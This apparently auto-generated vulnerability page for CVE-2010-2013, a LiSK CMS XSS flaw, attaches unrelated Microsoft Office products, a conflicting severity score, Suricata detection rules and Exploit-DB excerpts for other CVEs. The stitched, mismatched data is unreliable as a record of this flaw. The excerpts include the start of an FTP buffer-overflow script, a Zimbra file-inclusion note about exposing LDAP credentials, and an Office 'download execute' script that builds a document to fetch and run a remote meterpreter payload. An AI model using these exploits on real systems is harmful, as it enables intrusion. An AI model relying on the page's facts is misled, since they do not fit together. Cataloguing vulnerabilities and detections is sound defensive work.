CVE-2010-2013
published 2010-05-24CVE-2010-2013: Cross-site scripting (XSS) vulnerability in cp/edit_email.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the id…
PriorityP414medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
1.06%
60.4th percentile
Cross-site scripting (XSS) vulnerability in cp/edit_email.php in LiSK CMS 4.4 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
Affected
13 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| createch-group | lisk_cms | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_32-bit_systems | — | — |
| msrc | microsoft_365_apps_for_enterprise_for_64-bit_systems | — | — |
| msrc | microsoft_excel_2010_service_pack_2 | — | — |
| msrc | microsoft_excel_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_excel_2013_service_pack_1 | — | — |
| msrc | microsoft_excel_2016 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
| msrc | microsoft_office_2019_for_32-bit_editions | — | — |
| msrc | microsoft_office_2019_for_64-bit_editions | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_msrc7.8HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Suricata
ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
suricata·2013-01-15
CVE-2010-0188 ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request
Rule: alert http1 $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT_KIT Redkit Exploit Kit Three Numerical Character Naming Convention PDF Request"; flow:established,to_server; urilen:8; http.uri; pcre:"/\x2F[0-9]{3}\.pdf$/"; http.request_line; content:".pdf HTTP/1."; fast_pattern; reference:url,blogs.mcafee.com/mcafee-labs/red-kit-an-emerging-exploit-pack; reference:cve,2010-0188; classtype:exploit-kit; sid:2016210; rev:4; metadata:created_at 2013_01_15, cve CVE_2010_0188, performance_impact Moderate, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_07;)
Exploit-DB
Microsoft Excel - OLE Arbitrary Code Execution
exploitdb·2017-09-30
CVE-2017-0199 Microsoft Excel - OLE Arbitrary Code Execution
Microsoft Excel - OLE Arbitrary Code Execution
---
Title: MS Office Excel (all versions) Arbitrary Code Execution Vulnerability
Date: September 30th, 2017.
Author: Eduardo Braun Prado
Vendor Homepage: http://www.microsoft.com/
Software Link: https://products.office.com/
Version: 2007,2010,2013,2016 32/64 bits (x86 and x64)
Tested on: Windows 10/8.1/8.0/7/Server 2012/Server 2008/Vista (X86 and x64)
CVE: 2017-0199
Description:
MS Excel contains a remote code execution vulnerability upon processing OLE objects. Although this is a different issue from the
MS Word HTA execution vulnerability, it has been patched together, 'silently'. By performing some tests from the Word HTA PoC posted
on exploit-db[dot]com, it´s possible to exploit it through Excel too, however the target would ne
Exploit-DB
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
exploitdb·2016-08-10·CVSS 7.8
CVE-2016-3313 [HIGH] Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)
---
#####################################################################################
# Application: Microsoft Office Word
# Platforms: Windows, OSX
# Versions: Microsoft Office Word 2007,2010,2013,2016
# Author: Sébastien Morin of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @SebMorin1, @COSIG_
# Date: August 09, 2016
# CVE: CVE-2016-3313
# COSIG-2016-31
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#######################################################################################
1) Introduction
Microsoft Word is a word processor developed by Microsoft. It was first re
Exploit-DB
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
exploitdb·2015-12-14
CVE-2015-6132 Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=556
It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has a InProcServer32 pointing to comsvcs.dll. Specifically the CQueueAdmin object implemented in the dll.
When a user op
Exploit-DB
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
exploitdb·2015-09-16
CVE-2015-2510 Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
Microsoft Office 2007 - 'OGL.dll' ValidateBitmapInfo Bounds Check Failure (MS15-097)
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=469
The following crash was observed in Microsoft Office 2007 Excel with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug did not reproduce in Office 2010 or 2013.
Attached files:
Original File: 3013413838_orig.xls
Crashing File: 3013413838_crash.xls
Minimized Crashing File: 3013413838_min.xls
The minimized crashing file shows a one bit delta from the original file at offset 0x139F. OffVis did not reveal anything unique about this offset in the minimized file.
File Versions:
Excel.exe: 12.0.6718.5000
OGL.dll: 12.0.6719.5000
oart.dll: 12.0.6683.5002
GD
Exploit-DB
Zimbra 2009-2013 - Local File Inclusion
exploitdb·2013-12-06
CVE-2013-7091 Zimbra 2009-2013 - Local File Inclusion
Zimbra 2009-2013 - Local File Inclusion
---
# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30085.zip (zimbraexploit_rubina119.zip)
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allo
Exploit-DB
PCMan FTP Server 2.0 - Remote Buffer Overflow
exploitdb·2013-06-30
CVE-2013-4730 PCMan FTP Server 2.0 - Remote Buffer Overflow
PCMan FTP Server 2.0 - Remote Buffer Overflow
---
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
Exploit-DB
Pwstore - Denial of Service
exploitdb·2013-04-16
CVE-2013-5657 Pwstore - Denial of Service
Pwstore - Denial of Service
---
source: https://www.securityfocus.com/bid/62112/info
pwStore is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the application, denying service to legitimate users.
pwStore 2010.8.30.0 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
from sulley import *
import sys
import time
s_initialize("HTTP")
s_static("GET / HTTP/1.1\r\n")
s_static("Host")
s_static(":\x0d\x0a")
s_static(" ")
s_string("192.168.1.39")
s_static("\r\n")
s_static("\r\n")
print "Instantiating session"
sess = sessions.session(session_filename="https_pwstore.session", proto="ssl", sleep_time=0.50)
print "Instantiating target"
target = sessions.target("192.168.1.39", 443)
#target.procmon = pedrpc.client("127.0.0.1"
Exploit-DB
Microsoft Office 2010 - Download Execute
exploitdb·2013-02-20
CVE-2010-3333 Microsoft Office 2010 - Download Execute
Microsoft Office 2010 - Download Execute
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
http://secunia.com/advisories/39912http://www.htbridge.ch/advisory/xss_vulnerability_in_product.htmlhttp://www.securityfocus.com/archive/1/511379/100/0/threadedhttp://secunia.com/advisories/39912http://www.htbridge.ch/advisory/xss_vulnerability_in_product.htmlhttp://www.securityfocus.com/archive/1/511379/100/0/threaded
2010-05-24
Published